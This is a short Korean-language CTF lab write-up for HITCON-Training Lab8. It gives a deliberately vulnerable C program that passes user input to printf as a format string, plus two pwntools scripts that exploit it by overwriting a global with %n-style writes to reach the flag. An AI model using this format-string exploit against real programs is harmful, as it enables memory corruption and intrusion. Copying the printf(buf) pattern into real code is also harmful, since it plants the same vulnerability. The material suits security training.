[HITCON-Training]Lab8

그냥 magic 값만 맞춰주면 풀리는 문제다.

#include <stdio.h>

int magic = 0 ;	/* zero-initialised global; nothing in this file assigns it after this line, it is only compared in main() -- it changes only through the printf(buf) write below */

int main(){
	/* Lab target. A 0x100-byte stack buffer is filled from stdin and then
	 * handed to printf() as the FORMAT STRING, which is the bug this lab
	 * exercises. The defensive fix is printf("%s", buf) or fputs(buf, stdout);
	 * gcc -Wformat-security flags the call as written.
	 * Note: read() and system() are used without <unistd.h>/<stdlib.h>
	 * (implicit declarations), and main() falls off the end without a
	 * return statement (C99 treats that as return 0). */
	char buf[0x100];
	setvbuf(stdout,0,2,0);	/* mode 2 is glibc's _IONBF: unbuffered stdout so the prompt is flushed before read() blocks */
	puts("Please crax me !");
	printf("Give me magic :");
	read(0,buf,0x100);	/* return value unchecked; buf is never NUL-terminated and is uninitialised past the bytes read, so printf may scan beyond the input */
	printf(buf);	/* user-controlled format string: %-conversions read stack slots and %n-family conversions store to memory, which is how `magic` below gets changed */
	if(magic == 0xda){
		system("cat /home/craxme/flag");
	}else if(magic == 0xfaceb00c){
		system("cat /home/craxme/craxflag");
	}else{
		puts("You need be a phd");
	}

}

pwn 모듈 사용해서 magic의 값을 0xFACEB00C로 바꿔주면 된다.

exploit.py

from pwn import *

# First solution: let pwntools build the format-string write for us.
e = ELF('./craxme')  # loaded but never used below; could be dropped
p = process('./craxme')  # runs the target locally; see the C listing above for its behaviour

# Argument-slot index at which printf(buf) in the target reads back the start
# of the buffer we send; a page-specific value for this binary, not derivable
# from the C source alone.
offset = 7
# Address of the global `magic` in this binary (fixed address, so presumably
# a non-PIE build -- TODO confirm with checksec).
magic = 0x0804A038
#payload = fmtstr_payload(offset,{magic:0xDA})  # alternative: the 0xda branch of the target
payload = fmtstr_payload(offset,{magic:0xFACEB00C})  # %n-style write to *magic; root cause is the printf(buf) in the C listing, fixed by printf("%s", buf)
p.sendlineafter(':',payload)  # answers the "Give me magic :" prompt
p.interactive()


exploit.py

from pwn import *

# Second solution: the same single-byte write as fmtstr_payload, built by hand.
e = ELF('./craxme')  # unused below; could be dropped
p = process('./craxme')
offset = 7  # stack slot that printf(buf) reads for "%7$hhn"; page-specific for this binary

# The 4-byte address goes first; "%214d" then pads the output so that
# 4 + 214 = 218 = 0xda characters have been printed when "%7$hhn" stores
# the low byte of that count into *0x0804A038 -- the `magic` value the
# C listing compares against 0xda.
payload = p32(0x0804A038)
payload += '%{}d'.format(214)
payload += '%{}$hhn'.format(offset)
# NOTE(review): p32() returns bytes while the two format pieces are str, so
# this concatenation only works under Python 2 pwntools; on Python 3 it raises
# TypeError unless the format pieces are bytes as well.

p.sendlineafter(':',payload)  # answers the "Give me magic :" prompt
p.interactive()